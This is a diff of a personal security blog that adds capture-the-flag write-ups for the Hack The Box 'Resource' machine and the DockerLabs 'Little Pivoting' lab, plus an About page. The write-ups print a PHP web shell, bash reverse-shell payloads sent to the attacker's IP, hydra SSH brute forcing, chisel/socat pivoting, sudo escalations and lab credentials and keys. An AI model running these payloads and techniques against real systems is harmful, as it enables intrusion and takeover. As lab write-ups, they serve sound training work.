_posts/2024-09-04-offensive-sec.md Normal file
View File

File diff suppressed because it is too large Load Diff

472
_posts/2024-09-15-resource.md Normal file
View File

@ -0,0 +1,472 @@
---
title: HTB - Resource
date: 2024-08-23 00:00:00 +8000
categories: [hackthebox ]
tags: [HackTheBox, LFI, RCE, Lateral Movement]
image:
path: /assets/img/post/resource/Resource.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Resource.
---
## Box Info
| Name | Resource |
| :-------------------- | ---------------: |
| Release Date | 3 Sep, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
# Enumeration Exposed Services
ping -c 3 10.10.11.27
![Image](../assets/img/post/resource/image.png)
target OS : Linux
## Nmap
```bash
sudo nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.27 -oG allports
```
```bash
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 17:44 EDT
Initiating SYN Stealth Scan at 17:44
Scanning 10.10.11.27 [65535 ports]
Discovered open port 80/tcp on 10.10.11.27
Discovered open port 22/tcp on 10.10.11.27
Discovered open port 2222/tcp on 10.10.11.27
Completed SYN Stealth Scan at 17:44, 13.29s elapsed (65535 total ports)
Nmap scan report for 10.10.11.27
Host is up, received user-set (0.15s latency).
Scanned at 2024-09-17 17:44:44 EDT for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
Raw packets sent: 65595 (2.886MB) | Rcvd: 65595 (2.624MB
nmap -sCV -p 22,80,2222 10.10.11.27 -oN targeted
# Nmap 7.94SVN scan initiated Tue Sep 17 17:45:51 2024 as: nmap -sCV -p 22,80,2222 -oN targeted 10.10.11.27
Nmap scan report for 10.10.11.27 (10.10.11.27)
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_ 256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
**Host file:**
```bash
echo "10.10.11.27 itrc.ssh.htb" | sudo tee /etc/hosts
10.10.11.27 itrc.ssh.htb
```
# Enumeration Of Web Services
**Whatweb:**
![Image](../assets/img/post/resource/image-1.png)
**php 8.1.29 version**
**Web:**
![Image](../assets/img/post/resource/image-2.png)
**Register and login**
![Image](../assets/img/post/resource/image-3.png)
When i create a empty file with extension zip and upload, display a error.
![Image](../assets/img/post/resource/image-4.png)
## Parameter Enumerartion
```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://itrc.ssg.htb/index.php?page=FUZZ' -fs 3120
```
![Image](../assets/img/post/resource/image-5.png)
![Image](../assets/img/post/resource/image-6.png)
Possible user?
`zzinter`
![Image](../assets/img/post/resource/image-7.png)
## LFI - Local File Inclusion
Back to the error that we got upload empty file.
```bash
**Deprecated**: ZipArchive::open(): Using empty file as ZipArchive is deprecated in **/var/www/itrc/savefile.inc.php** on line **38**
**Warning**: hash_file(/tmp/phpXqBGtj): Failed to open stream: No such file or directory in **/var/www/itrc/savefile.inc.php** on line **48**
**Warning**: Cannot modify header information - headers already sent by (output started at /var/www/itrc/savefile.inc.php:38) in **/var/www/itrc/api/create_ticket.php** on line **31**
```
- ZipArchive::open()
- hash_file
# Identification and exploitation of vulnerabilities
`/var/www/itrc/api/create_ticket.php`
```bash
http://itrc.ssg.htb/?page=/var/www/itrc/api/create_ticket
```
[wrappers](https://www.php.net/manual/en/wrappers.phar.php)
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#phar-archive-structure)
https://www.php.net/manual/en/context.phar.php
```php
<?php
system($_GET['cmd']);
__HALT_COMPILER();
?>
```
zip the file.php and upload
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell
```
![Image](../assets/img/post/resource/image-8.png)
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=whoami
```
![Image](../assets/img/post/resource/image-9.png)
## RCE | Remote Code Execution
Now we can execute remote code for get a reverse shell.
**Encode to url with burpsuite**
`bash -c 'bash -i >& /dev/tcp/10.10.16.50/9090 0>&1'`
```bash
http://itrc.ssg.htb/?page=phar://uploads/c4fc5aed4a14dce224f81471133d1c0673819db1.zip/shell&cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.16.50/9090+0%3E%261%27
```
```bash
rlwrap nc -nlvp 9090
```
![Image](../assets/img/post/resource/image-10.png)
We have a 2 users:
```
msainristil:x:1000:1000::/home/msainristil:/bin/bash
zzinter:x:1001:1001::/home/zzinter:/bin/bash
```
```
$dsn = "mysql:host=db;dbname=resourcecenter;";
$dbusername = "jj";
$dbpassword = "ugEG5rR5SG8uPd";
$pdo = new PDO($dsn, $dbusername, $dbpassword);
```
`cat itrc.ssg.htb.har | grep msainristil`
![Image](../assets/img/post/resource/image-11.png)
```bash
text": "user=msainristil&pass=82yards2closeit",
"value": "msainristil"
```
```bash
ssh msainristil@itrc.ssg.htb
```
![Image](../assets/img/post/resource/image-12.png)
We found a 2 files in decomission_old_ca
## Lateral Movement | Zzinter itrc
The main purpose of ca-itrc and ca-itrc.pub is to sign public keys of other users, thereby generating certificates that validate the identity of users. This allows for secure authentication in systems that trust the certificate authority (CA).
![Image](../assets/img/post/resource/image-13.png)
1. Create a new key
```ssh
ssh-keygen -t rsa -b 2048 -f racc0x
```
2. Sign the public key with the CA's private key
```ssh
ssh-keygen -s ca-itrc -I ca-itrc.pub -n zzinter racc0x.pub
```
3. Verify the certificate
```ssh
ssh-keygen -Lf racc0x-cert.pub
```
4. Login in the host as zzinter
```ssh
ssh -o CertificateFile=racc0x-cert.pub -i racc0x zzinter@localhost
```
![Image](../assets/img/post/resource/image-14.png)
## Lateral Movement | Root itrc
We can do the same procces for root
```bash
ssh-keygen -t rsa -b 2048 -f root
ssh-keygen -s ca-itrc -I ca-itrc.pub -n root root.pub
ssh -o CertificateFile=root-cert.pub -i root root@localhost
```
![Image](../assets/img/post/resource/image-15.png)
We found as zzinter a code
`sign_key_api.sh`
```bash
#!/bin/bash
usage () {
echo "Usage: $0 <public_key_file> <username> <principal>"
exit 1
}
if [ "$#" -ne 3 ]; then
usage
fi
public_key_file="$1"
username="$2"
principal_str="$3"
supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
if ! echo "$supported_principals" | grep -qw "$word"; then
echo "Error: '$word' is not a supported principal."
echo "Choose from:"
echo " webserver - external web servers - webadmin user"
echo " analytics - analytics team databases - analytics user"
echo " support - IT support server - support user"
echo " security - SOC servers - support user"
echo
usage
fi
done
if [ ! -f "$public_key_file" ]; then
echo "Error: Public key file '$public_key_file' not found."
usage
fi
public_key=$(cat $public_key_file)
curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
```
## Lateral Movement | Support ssg
Repeat the proccess
`ssh-keygen -t rsa -d 2048 -f support`
`chmod 600 support`
```bash
bash ./sign_key_api.sh support.pub support support
```
```bash
echo " ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgVTxuoP/banVH1XRmI9muNjrcQ05tY2m5rr+eqqLjVtcAAAADAQABAAABAQDDlPBIRX6jnGGizXf5Ps+iovHfkVbWE51/d6mpN4O8Z6M0GPsGGe6hJ30FIPFby47HeShIdidUd572ZlBeBr6woRxXI242UFjw1VGDhZMYSoH8QAC5oYtoS/vSWNiTETBCTkL20ddU2bUUmMhxg3JLhNue6NcUwgJOz2tCQcsRC41b8RkuH7JrPc19R8lsYPHwUGaK+ridimuHL2QsusB5KxsfHvr4gVud7TT1YHvy0nYa2DGM6GsJ7oN4/Jt4lcFLFs+tpiRFsPOMTk+9RbMmsUjk/mTCwMlys7sXVrl9pIERISrXEmQe89+X2Tl/k0Wr0vTOaLkHNLMWYZ6+AD+jAAAAAAAAACgAAAABAAAAB3N1cHBvcnQAAAALAAAAB3N1cHBvcnQAAAAAZuE5o///////////AAAAAAAAAIIAAAAVcGVybWl0LVgxMS1mb3J3YXJkaW5nAAAAAAAAABdwZXJtaXQtYWdlbnQtZm9yd2FyZGluZwAAAAAAAAAWcGVybWl0LXBvcnQtZm9yd2FyZGluZwAAAAAAAAAKcGVybWl0LXB0eQAAAAAAAAAOcGVybWl0LXVzZXItcmMAAAAAAAAAAAAAADMAAAALc3NoLWVkMjU1MTkAAAAggeDwK53LVKHJh+rMLcA2WABxbtDgyhm57MATyY0VKbEAAABTAAAAC3NzaC1lZDI1NTE5AAAAQBRXvjDs2DgTA2aM3eMElVZrECn5Nh/1gycQhDkSaAVXEA5u6c2hAlOiQFJtLTYY+mLdafmv5MooQh92AdgrjQY= zzinter@itrc" > racc0x
```
```bash
ssh -i support -p 2222 -o CertificateFile=racc0x support@172.223.0.1
```
![Image](../assets/img/post/resource/image-16.png)
![Image](../assets/img/post/resource/image-17.png)
## Lateral Movement | Zzinter ssg
We go to do the same proccess
`ssh-keygen -t rsa -b 2048 -f zzinter`
```bash
echo "ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgff6r7XjpBfVUeEjR8/R2MMMlznI8UndoAxoNgKwuIAQAAAADAQABAAABAQDHnZIE137c9lDZzVmrru1JuzIenLN9ImpXMpza8+Ny2P9t0rDjTCuZsXtPa7X60gFxJUzjylRbXEvvb3csDT+qgjwGkAG0AcmBF7RTGiKddcE0eon3WvU+3xs4ffiZm1vOZ6YzSyiKWAzz+xD4Q3S2zRQwoX1Q+E7/QtVibkVhO5rO3j5NpXLRocXi4aNzjKk6S7POF7UH/XNjzb/iVqiY+XiuHwQDFilydiZkWAEJxnRWLZk+Noict1OJsEEBeff7ki/pvK6pvYepL3NyYaB7xOp+IR02m+RjUf0VVNsA2zFiy1XgEydhHEkLyJz667CnqQQxRxPPyrkeiL6lk/TxAAAAAAAAACoAAAABAAAAB3p6aW50ZXIAAAAQAAAADHp6aW50ZXJfdGVtcAAAAABm4UHK//////////8AAAAAAAAAggAAABVwZXJtaXQtWDExLWZvcndhcmRpbmcAAAAAAAAAF3Blcm1pdC1hZ2VudC1mb3J3YXJkaW5nAAAAAAAAABZwZXJtaXQtcG9ydC1mb3J3YXJkaW5nAAAAAAAAAApwZXJtaXQtcHR5AAAAAAAAAA5wZXJtaXQtdXNlci1yYwAAAAAAAAAAAAAAMwAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAFMAAAALc3NoLWVkMjU1MTkAAABAluOC7mW2itTs0+Zz+GRpC5MLqHxahXMfDH8fWb2rRTlvYoGHO23i+zMywGiUWLLpXEL3Se1ZoN5Bihh583vXBw== zzinter@itrc" > raccox
```
`chmod 600 raccox`
`chmod 600 zzinter`
```bash
ssh -p 2222 -i zzinter -o CertificateFile=raccox zzinter@172.223.0.1
```
![Image](../assets/img/post/resource/image-18.png)
![Image](../assets/img/post/resource/image-19.png)
`Sudo -l`
![Image](../assets/img/post/resource/image-20.png)
This is the same process as with `sign_key_api.sh`.
- sign_key.sh
```python
#!/bin/bash
usage () {
echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
exit 1
}
if [ "$#" -ne 5 ]; then
usage
fi
ca_file="$1"
public_key_file="$2"
username="$3"
principal_str="$4"
serial="$5"
if [ ! -f "$ca_file" ]; then
echo "Error: CA file '$ca_file' not found."
usage
fi
itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
echo "Error: Use API for signing with this CA."
usage
fi
if [ ! -f "$public_key_file" ]; then
echo "Error: Public key file '$public_key_file' not found."
usage
fi
supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
if ! echo "$supported_principals" | grep -qw "$word"; then
echo "Error: '$word' is not a supported principal."
echo "Choose from:"
echo " webserver - external web servers - webadmin user"
echo " analytics - analytics team databases - analytics user"
echo " support - IT support server - support user"
echo " security - SOC servers - support user"
echo
usage
fi
done
if ! [[ $serial =~ ^[0-9]+$ ]]; then
echo "Error: '$serial' is not a number."
usage
fi
ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principal" "$public_key_file"
```
## Lateral Movement | Root ssg
```python
import string
import subprocess
s = string.ascii_letters+'+'+ '-' + '\n' + ' '+ '/' + '=' + string.digits
strlist = '-'
while True:
for i in s:
listres = i + strlist
listtemp = '*' + listres
with open('testca', 'w') as f:
f.write(listtemp)
a=subprocess.run(f'sudo /opt/sign_key.sh ./testca test.pub root root_user 1', shell=True, stdout=subprocess.PIPE, text=True)
if 'Use API for signing with this CA' in a.stdout:
strlist = listres
print(strlist)
break
```
`ca.key`
```
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc
rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ
AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA
cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV
QBAgM=
-----END OPENSSH PRIVATE KEY-----
```
`chmod 600 ca.key`
```bash
ssh-keygen -s ca.key -z 200 -I root -V -10w:forever -n root_user root.pub
```
The output is give us a root-cert.pub
```bash
ssh root@itrc.ssg.htb -p2222 -i root -i root-cert.pub
```
![Image](../assets/img/post/resource/image-21.png)

356
_posts/2024-09-21-littlepivoting.md Normal file
View File

@ -0,0 +1,356 @@
---
title: Docker Labs - Little Pivoting
date: 2024-08-23 00:00:00 +8000
categories: [dockerlabs ]
tags: [DockerLabs, Pivoting, SSH Brute Force, Hydra, Sudoers, Chisel, Socat, Remote Port Forwarding, SUID, Abusing File Upload]
image:
path: /assets/img/post/littlepivoting/pivoting.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Docker Labs - Little Pivoting.
---
## Box Info
| Name | Little Pivoting |
| :-------------------- | ---------------: |
| Release Date | 19 April, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
**Download lab here: https://dockerlabs.es/
# Network diagram
![Image](../assets/img/post/littlepivoting/image.png)
![alt text](image.png)
## Nmap
```bash
nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.2 -oG allports
nmap -sCV -p 22,80 10.10.10.2 -oN targeted
```
```bash
# Nmap 7.94SVN scan initiated Fri Sep 20 19:00:41 2024 as: nmap -sCV -p 22,80 -oN targeted 10.10.10.2
Nmap scan report for 10.10.10.2 (10.10.10.2)
Host is up (0.00015s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA)
|_ 256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 20 19:00:48 2024 -- 1 IP address (1 host up) scanned in 6.66 seconds
```
The first page we found a default page from Apache, I will use feroxbuster for directory scan for found some interesting.
```bash
feroxbuster -u http://10.10.10.2/
```
![Image](../assets/img/post/littlepivoting/image-1.png)
http://10.10.10.2/shop/
![Image](../assets/img/post/littlepivoting/image-2.png)
Its a variable of php, so that means we can use a Local File Inclusion with php.
![Image](../assets/img/post/littlepivoting/image-3.png)
## LFI
```bash
http://10.10.10.2/shop/index.php?archivo=/etc/passwd
```
```bash
http://10.10.10.2/shop/index.php?archivo=../../../../etc/passwd
```
_By adding 'index.php' at the end of the URL, the web server interprets that a PHP file in the root directory of the website is being accessed, and then the 'archivo' parameter is used to include the specified file in the URL._
![Image](../assets/img/post/littlepivoting/image-4.png)
**We found 2 users:**
seller:x:1000:1000:seller,,,:/home/seller:/bin/bash
manchi:x:1001:1001:manchi,,,:/home/manchi:/bin/bash
### Brute Force Attack | SSH
```bash
hydra -l manchi -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.2 -t 4
```
![Image](../assets/img/post/littlepivoting/image-5.png)
```bash
> hostname -I
```
![Image](../assets/img/post/littlepivoting/image-6.png)
The script scans for devices on the network 20.20.20.1 to 20.20.20.254 by pinging each IP address to find out which ones are active.
```bash
#!/bin/bash
for host in $(seq 1 254); do
timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host"
done; wait
```
![Image](../assets/img/post/littlepivoting/image-7.png)
![Image](../assets/img/post/littlepivoting/image-8.png)
## Pivoting | 20.20.20.0/24
#### manchi
1. Upload chisel to victim machine
2. Execute chisel in attack machine
```bash
./chisel server -p 6150 --reverse
```
![Image](../assets/img/post/littlepivoting/image-9.png)
3. Execute chisel in victim machine.
As you can see, port `1080` is open by default in our machine. This port is crucial for the exchange of communications between 10.10.10.2 and our IP, {10.10.10.1}.
```bash
./chisel client {IP}:6150 R:socks
```
![Image](../assets/img/post/littlepivoting/image-10.png)
4. We just need to configure the proxychains.
4. 1. uncomment `dynamic_chain` and comment `strict_chain`
![Image](../assets/img/post/littlepivoting/image-11.png)
4. 2. Comment socks4 and add socks5 127.0.0.1 1080
![Image](../assets/img/post/littlepivoting/image-12.png)
## Nmap | ProxyChains
Specify ports 22 and 80 because they are the only ones that appeared in the initial scan.
```BASH
sudo proxychains nmap -sCV -sT -Pn 22,80 20.20.20.3 2>&1 | grep -vE "timeout|OK"
```
![Image](../assets/img/post/littlepivoting/image-13.png)
### FoxyProxy
We gonna add the socks to foxyproxy extension in firefox for see the web page of 20.20.20.3.
![Image](../assets/img/post/littlepivoting/image-14.png)
We have another default page from Apache 2. I guess we have to follow the same process as before.
![Image](../assets/img/post/littlepivoting/image-15.png)
```bash
feroxbuster -u http://20.20.20.3/ --proxy socks5://127.0.0.1:1080
```
```bash
feroxbuster -u http://20.20.20.3/secret.php/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -x php,html
```
![Image](../assets/img/post/littlepivoting/image-16.png)
Possible user: **Mario**
## Remote Port Forwarding
I suppose we have to do the brute force attack process again to get "mario" password, however we cannot specify a specific port for hydra, it has its own default port which is 22. Now we will bring port 22 from machine 20.20.20.3 to be our port 22, a remote port forwarding for attack the our port 22.
We need to create a new login as manchi and run again the chisel.
```bash
./chisel client 10.10.10.1:6150 R:22:20.20.20.3:22
```
![Image](../assets/img/post/littlepivoting/image-17.png)
```bash
./chisel server -p 6150 --reverse
```
![Image](../assets/img/post/littlepivoting/image-18.png)
```bash
lsof -i:22
```
![Image](../assets/img/post/littlepivoting/image-19.png)
## Brute Force Attack | 20.20.20.3
### Mario
```bash
hydra -l mario ssh://127.0.0.1 -P /usr/share/wordlists/rockyou.txt -t 4
```
![Image](../assets/img/post/littlepivoting/image-20.png)
```bash
proxychains ssh mario@20.20.20.3
```
![Image](../assets/img/post/littlepivoting/image-21.png)
`sudo -l`
![Image](../assets/img/post/littlepivoting/image-22.png)
[GTFO](https://gtfobins.github.io/gtfobins/vim/#shell)
```bash
sudo vim -c ':!/bin/sh'
```
![Image](../assets/img/post/littlepivoting/image-23.png)
Run againt the script.
![Image](../assets/img/post/littlepivoting/image-24.png)
## Pivoting | 30.30.30.0/24
We send the chisel bin from 20.20.20.2(manchi) to 20.20.20.3(Mario).
![Image](../assets/img/post/littlepivoting/image-25.png)
![Image](../assets/img/post/littlepivoting/image-26.png)
Now we will use **socat**, which will allow us, from the machine 30.30.30.2, to connect with chisel to the machine 20.20.20.2, and the machine 20.20.20.2 will redirect that connection to 10.10.10.1, which is us.
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
![Image](../assets/img/post/littlepivoting/image-27.png)
```bash
manchi 20.20.20.2
./socat TCP-LISTEN:1111,fork TCP:10.10.10.1:6150
```
![Image](../assets/img/post/littlepivoting/image-28.png)
1. **Connection from 20.20.20.3 to 20.20.20.2**: The machine 20.20.20.3 connects to the compromised machine (20.20.20.2) on port 1111 using chisel and the fork option allows handling multiple connections simultaneously..
2. **Redirection by socat**: When a connection is established on port 1111 of 20.20.20.2, socat redirects that connection to the machine 10.10.10.1 on port 6150.
```bash
root 20.20.20.3
./chisel client 20.20.20.2:1111 R:1111:socks
```
![Image](../assets/img/post/littlepivoting/image-29.png)
3. **Data flow**: This allows any traffic that arrives at port 1111 on 20.20.20.2 to be sent to 10.10.10.1:6150, and vice versa, enabling communication between 20.20.20.3 and 10.10.10.1 through the compromised machine.
![Image](../assets/img/post/littlepivoting/image-30.png)
```java
2024/09/21 00:48:54 server: session#4: tun: proxy#R:127.0.0.1:1111=>socks: Listening
```
### Nmap | 30.30.30.3
```bash
sudo proxychains nmap -sCV -sT -Pn -p 22,80 30.30.30.3 2>&1 | grep -vE "timeout|OK"
```
We have only port 80 open.
![Image](../assets/img/post/littlepivoting/image-31.png)
## RCE
config the foxyproxy for visualizer the web page
![Image](../assets/img/post/littlepivoting/image-32.png)
I will upload empty file for see if found some error when upload the empty file.
![Image](../assets/img/post/littlepivoting/image-33.png)
```bash
feroxbuster -u http://30.30.30.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1111 -x php,html,js,txt
```
![Image](../assets/img/post/littlepivoting/image-34.png)
```python
<?php
system($_GET['cmd']);
__HALT_COMPILER();
?>
```
![Image](../assets/img/post/littlepivoting/image-35.png)
For get a reverse shell we need to log in as mario.
(proxychains ssh mario@20.20.20.3 | chocolate)
![Image](../assets/img/post/littlepivoting/image-36.png)
![Image](../assets/img/post/littlepivoting/image-37.png)
![Image](../assets/img/post/littlepivoting/image-38.png)
```bash
root 20.20.20.3
./socat TCP-LISTEN:443,fork TCP:20.20.20.2:442
```
```bash
manchi 20.20.20.2
./socat TCP-LISTEN:442,fork TCP:10.10.10.1:441
```
![Image](../assets/img/post/littlepivoting/image-39.png)
```python
http://30.30.30.3/uploads/f.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/30.30.30.2/443+0%3E%261%27
```
![Image](../assets/img/post/littlepivoting/image-40.png)
## Privilege Escalation | SUID
![Image](../assets/img/post/littlepivoting/image-41.png)
sudo -l
![Image](../assets/img/post/littlepivoting/image-42.png)
[GTFO-Env](https://ubh.natro92.fun/gtfobins/env/#sudo)
sudo env /bin/bash
![Image](../assets/img/post/littlepivoting/image-43.png)
Pwned!

18
_posts/2025-01-31-escapetwo.md Normal file
View File

@ -0,0 +1,18 @@
---
title: HTB - EscapeTwo
date: 2025-01-31 00:00:00 +8000
categories: [hackthebox]
tags: [HackTheBox, smb, kerberos, ldap, AD, Active Directory]
image:
path: /assets/img/post/escapetwo/EscapeTwo.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - EscapeTwo.
---
## Box Info
| Name | EscapeTwo |
| :-------------------- | ---------------: |
| Release Date | 31 Jun, 2025 |
| OS | Windows |
| Rated Difficulty | Easy |

35
_tabs/about.md
View File

@ -1,8 +1,33 @@
---
# the default layout is 'page'
icon: fas fa-info-circle
order: 4
title: About
icon: fas fa-info
order: 5
---
> Add Markdown syntax content to file `_tabs/about.md`{: .filepath } and it will show up on this page.
{: .prompt-tip }
Welcome to my security blog, where I like to discuss my personal security research, experiences, and opinions on all things security. I'm really interested web hacking and network security.
Here Ill be posting writeups and CTFs solutions which you can read to learn from me, or to solve the challange with my solution. Ill also be posting security investigations and proof of concepts I create, within the explanation of the vulnerability.
I also really like doing CTFs particularly on [Hackthebox](https://app.hackthebox.com/)
I'm always happy to chat if you have any questions.
I am currently completed Hack The Box ProLabs: [Dante]() [Zephyr]() [POO]()
- Certifications:
<a alt="Zephyr" href="https://www.linkedin.com/in/th%C3%A9o-chiles/overlay/1635516653561/single-media-viewer/?profileId=ACoAADT0-YEBqwHhA1HIRlRpqcjgpH9-PV3P86E"><img alt="Zephyr" src="/assets/img/Zephyr.png" height="100" width="75"/></a>
<a alt="Dante" href="https://www.linkedin.com/in/th%C3%A9o-chiles/details/featured/1635516657103/single-media-viewer/?profileId=ACoAADT0-YEBqwHhA1HIRlRpqcjgpH9-PV3P86E"><img alt="Dante" src="/assets/img/Dante.png" height="100" width="75"/></a>
- CTFs platforms:
<p><script src="https://www.hackthebox.eu/badge/147818"></script></p>
## Contact Information:
<a alt="Github" href="https://github.com/racc0x/"><img alt="Github" src="/assets/img/Github.png" height="50" width="50"/></a>
<a alt="Twitter" href="https://twitter.com/Dreii042"><img alt="Twitter" src="/assets/img/Twitter.png" height="50" width="50"/></a>
<a alt="Linkedin" href="https://www.linkedin.com/in/edreihernandez/"><img alt="Linkedin" src="/assets/img/Linkedin.png" height="50" width="50"/></a>
<a alt="Discord" href="https://discordapp.com/users/563525392120676371"><img alt="Discord" src="/assets/img/Discord.png" height="50" width="50"/></a>

BIN
assets/img/Dante.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 173 KiB

BIN
assets/img/Discord.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 71 KiB

BIN
assets/img/Github.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 8.4 KiB

BIN
assets/img/Linkedin.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.0 KiB

BIN
assets/img/Twitter.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 15 KiB

BIN
assets/img/Zephyr.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.1 MiB

BIN
assets/img/cathy.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 122 KiB

BIN
assets/img/favicons/android-chrome-192x192.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
assets/img/favicons/android-chrome-256x256.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 90 KiB

BIN
assets/img/favicons/apple-touch-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 50 KiB

BIN
assets/img/favicons/favicon-16x16.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
assets/img/favicons/favicon-32x32.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.9 KiB

BIN
assets/img/favicons/favicon.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 15 KiB

BIN
assets/img/favicons/mstile-150x150.png Normal file
View File

